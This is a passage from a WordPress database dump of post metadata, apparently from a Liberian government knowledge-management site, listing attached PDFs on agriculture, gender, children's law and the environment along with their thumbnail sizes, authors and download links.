"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"lisgis-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"lisgis-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"lisgis-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"lisgis-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"lisgis-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31388,4418,'_wp_attached_file','2021/09/Final-Agriculture-Recall-chapter-2016-11.pdf'),(31389,4416,'_wp_page_template','default'),(31390,4416,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Final-Agriculture-Recall-chapter-2016-11.pdf'),(31391,4416,'by','LISGIS'),(31392,4416,'year','2017'),(31393,4416,'_pods_document_cover_image','a:1:{i:0;i:4417;}'),(31394,4416,'document_cover_image','4417'),(31395,4416,'_pods_attached_document','a:1:{i:0;i:4418;}'),(31396,4416,'attached_document','4418'),(31397,4420,'_last_editor_used_jetpack','classic-editor'),(31398,4420,'_edit_lock','1632860342:42'),(31399,4420,'_edit_last','42'),(31400,4421,'_wp_attached_file','2021/09/lisgis-1.png'),(31401,4421,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2021/09/lisgis-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"lisgis-1-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"lisgis-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"lisgis-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"lisgis-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"lisgis-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"lisgis-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"lisgis-1-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31402,4422,'_wp_attached_file','2021/09/HIES-2016_StatisticalAbstract_Final_final.pdf'),(31403,4420,'_wp_page_template','default'),(31404,4420,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/HIES-2016_StatisticalAbstract_Final_final.pdf'),(31405,4420,'by','LISGIS'),(31406,4420,'year','2017'),(31407,4420,'_pods_document_cover_image','a:1:{i:0;i:4421;}'),(31409,4420,'_pods_attached_document','a:1:{i:0;i:4422;}'),(31411,4420,'document_cover_image','4421'),(31412,4420,'attached_document','4422'),(31413,4424,'_last_editor_used_jetpack','classic-editor'),(31414,4424,'_edit_lock','1632861916:42'),(31415,4424,'_edit_last','42'),(31416,4425,'_wp_attached_file','2021/09/gender.png'),(31417,4425,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:18:\"2021/09/gender.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"gender-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"gender-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"gender-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:17:\"gender-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:18:\"gender-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:18:\"gender-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:18:\"gender-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31418,4426,'_wp_attached_file','2021/09/genderassessment_liberia1.pdf'),(31419,4424,'_wp_page_template','default'),(31420,4424,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/genderassessment_liberia1.pdf'),(31421,4424,'by','Moses M. Zinnah, Mulbah S. Jackollie, Emmett Crayton and Olive B. Cisco'),(31422,4424,'year','2020'),(31423,4424,'_pods_document_cover_image','a:1:{i:0;i:4425;}'),(31424,4424,'document_cover_image','4425'),(31425,4424,'_pods_attached_document','a:1:{i:0;i:4426;}'),(31426,4424,'attached_document','4426'),(31427,4428,'_last_editor_used_jetpack','classic-editor'),(31428,4428,'_edit_lock','1632862408:42'),(31429,4428,'_edit_last','42'),(31430,4429,'_wp_attached_file','2021/09/gender-1.png'),(31431,4429,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2021/09/gender-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"gender-1-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"gender-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"gender-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"gender-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"gender-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"gender-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"gender-1-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31432,4430,'_wp_attached_file','2021/09/REVISED-DRAFT-6-Act_to_establish_Ministry_of_Gender_and_Social_Welfare_Revised-Final-1.pdf'),(31433,4428,'_wp_page_template','default'),(31434,4428,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/REVISED-DRAFT-6-Act_to_establish_Ministry_of_Gender_and_Social_Welfare_Revised-Final-1.pdf'),(31435,4428,'by','MFDP'),(31436,4428,'year',''),(31437,4428,'_pods_document_cover_image','a:1:{i:0;i:4429;}'),(31438,4428,'document_cover_image','4429'),(31439,4428,'_pods_attached_document','a:1:{i:0;i:4430;}'),(31440,4428,'attached_document','4430'),(31441,4432,'_last_editor_used_jetpack','classic-editor'),(31442,4432,'_edit_lock','1632862597:42'),(31443,4432,'_edit_last','42'),(31444,4433,'_wp_attached_file','2021/09/gender-2.png'),(31445,4433,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2021/09/gender-2.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"gender-2-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"gender-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"gender-2-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"gender-2-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"gender-2-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"gender-2-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"gender-2-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31446,4434,'_wp_attached_file','2021/09/Summarized-Strategic-Plan-2016to2021-Draft1.pdf'),(31447,4432,'_wp_page_template','default'),(31448,4432,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Summarized-Strategic-Plan-2016to2021-Draft1.pdf'),(31449,4432,'by','MFDP'),(31450,4432,'year',''),(31451,4432,'_pods_document_cover_image','a:1:{i:0;i:4433;}'),(31452,4432,'document_cover_image','4433'),(31453,4432,'_pods_attached_document','a:1:{i:0;i:4434;}'),(31454,4432,'attached_document','4434'),(31455,4436,'_last_editor_used_jetpack','classic-editor'),(31456,4436,'_edit_lock','1632867723:42'),(31457,4436,'_edit_last','42'),(31458,4437,'_wp_attached_file','2021/09/gender-3.png'),(31459,4437,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:20:\"2021/09/gender-3.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"gender-3-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"gender-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"gender-3-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"gender-3-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:20:\"gender-3-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:20:\"gender-3-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:20:\"gender-3-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31460,4438,'_wp_attached_file','2021/09/Liberia_Childrens_Law20111.pdf'),(31461,4436,'_wp_page_template','default'),(31462,4436,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Liberia_Childrens_Law20111.pdf'),(31463,4436,'by','MFDP'),(31464,4436,'year','2011'),(31465,4436,'_pods_document_cover_image','a:1:{i:0;i:4437;}'),(31466,4436,'document_cover_image','4437'),(31467,4436,'_pods_attached_document','a:1:{i:0;i:4438;}'),(31468,4436,'attached_document','4438'),(31469,4440,'_last_editor_used_jetpack','classic-editor'),(31470,4440,'_edit_lock','1632927672:42'),(31471,4440,'_edit_last','42'),(31472,4441,'_wp_attached_file','2021/09/biodiversity-updated-laws.png'),(31473,4441,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:37:\"2021/09/biodiversity-updated-laws.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"biodiversity-updated-laws-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"biodiversity-updated-laws-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:37:\"biodiversity-updated-laws-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:36:\"biodiversity-updated-laws-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:37:\"biodiversity-updated-laws-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:37:\"biodiversity-updated-laws-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:37:\"biodiversity-updated-laws-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31474,4442,'_wp_attached_file','2021/09/Biological-Diversity.pdf'),(31475,4440,'_wp_page_template','default'),(31476,4440,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Biological-Diversity.pdf'),(31477,4440,'by','Morris. B. Kamara Sr.'),(31478,4440,'year','2020'),(31479,4440,'_pods_document_cover_image','a:1:{i:0;i:4441;}'),(31480,4440,'document_cover_image','4441'),(31481,4440,'_pods_attached_document','a:1:{i:0;i:4442;}'),(31482,4440,'attached_document','4442'),(31483,4444,'_last_editor_used_jetpack','classic-editor'),(31484,4444,'_edit_lock','1632927930:42'),(31485,4444,'_edit_last','42'),(31486,4445,'_wp_attached_file','2021/09/climate-change-1.png'),(31487,4445,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:28:\"2021/09/climate-change-1.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"climate-change-1-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"climate-change-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:28:\"climate-change-1-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:27:\"climate-change-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:28:\"climate-change-1-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:28:\"climate-change-1-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:28:\"climate-change-1-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31488,4446,'_wp_attached_file','2021/09/Climate-Change.pdf'),(31489,4444,'_wp_page_template','default'),(31490,4444,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Climate-Change.pdf'),(31491,4444,'by','Morris. B. Kamara Sr.'),(31492,4444,'year','2020'),(31493,4444,'_pods_document_cover_image','a:1:{i:0;i:4445;}'),(31494,4444,'document_cover_image','4445'),(31495,4444,'_pods_attached_document','a:1:{i:0;i:4446;}'),(31496,4444,'attached_document','4446'),(31497,4448,'_last_editor_used_jetpack','classic-editor'),(31498,4448,'_edit_lock','1632928145:42'),(31499,4448,'_edit_last','42'),(31500,4449,'_wp_attached_file','2021/09/land-management.png'),(31501,4449,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:467;s:4:\"file\";s:27:\"2021/09/land-management.png\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"land-management-193x300.png\";s:5:\"width\";i:193;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"land-management-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:27:\"land-management-300x265.png\";s:5:\"width\";i:300;s:6:\"height\";i:265;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:26:\"land-management-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:27:\"land-management-230x230.png\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:27:\"land-management-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:27:\"land-management-300x450.png\";s:5:\"width\";i:300;s:6:\"height\";i:450;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31502,4450,'_wp_attached_file','2021/09/Land-Management.pdf'),(31503,4448,'_wp_page_template','default'),(31504,4448,'download_link','https://ekmsliberia.info/wp-content/uploads/2021/09/Land-Management.pdf'),(31505,4448,'by','Morris. B. Kamara Sr.'),(31506,4448,'year','2020'),(31507,4448,'_pods_document_cover_image','a:1:{i:0;i:4449;}'),(31508,4448,'document_cover_image','4449'),(31509,4448,'_pods_attached_document','a:1:{i:0;i:4450;}'),(31510,4448,'attached_document','4450'),(31513,4454,'_edit_lock','1634555908:42'),(31514,4454,'_last_editor_used_jetpack','block-editor'),(31515,4455,'_wp_attached_file','2021/10/Pic-for-inspector-story.jpeg'),(31516,4455,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:36:\"2021/10/Pic-for-inspector-story.jpeg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-300x155.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-768x398.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:35:\"Pic-for-inspector-story-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-600x311.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:36:\"Pic-for-inspector-story-640x530.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(31519,4454,'_wp_old_date','2021-10-18'),(31520,4454,'_thumbnail_id','4455'),(31521,4454,'_edit_last','42'),(31522,4454,'kava_extra_enable_breadcrumbs','inherit'),(31523,4454,'post_formats',''),(31524,4454,'gallery_tab',''),(31525,4454,'kava_extra_gallery_images',''),(31526,4454,'link_tab',''),(31527,4454,'kava_extra_link',''),(31528,4454,'kava_extra_link_target','_blank'),(31529,4454,'quote_tab',''),(31530,4454,'kava_extra_quote_text',''),(31531,4454,'kava_extra_quote_cite',''),(31532,4454,'audio_tab',''),(31533,4454,'kava_extra_audio',''),(31534,4454,'kava_extra_audio_loop','false'),(31535,4454,'kava_extra_audio_autoplay','false'),(31536,4454,'kava_extra_audio_preload','false'),(31537,4454,'video_tab',''),(31538,4454,'kava_extra_video_type','library'),(31539,4454,'kava_extra_video_library',''),(31540,4454,'kava_extra_video_external',''),(31541,4454,'kava_extra_video_poster',''),(31542,4454,'kava_extra_video_width','770'),(31543,4454,'kava_extra_video_height','480'),(31544,4454,'kava_extra_video_loop','false'),(31545,4454,'kava_extra_video_autoplay','false'),(31546,4454,'kava_extra_video_preload','false'),(31547,4457,'_last_editor_used_jetpack','classic-editor'),(31548,4457,'_edit_lock','1665591622:42'),(31549,4457,'_edit_last','42'),(31551,4459,'_wp_attached_file','2021/10/MOE-logo.png'),(31552,4459,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:20:\"2021/10/MOE-logo.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"MOE-logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:19:\"MOE-logo-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\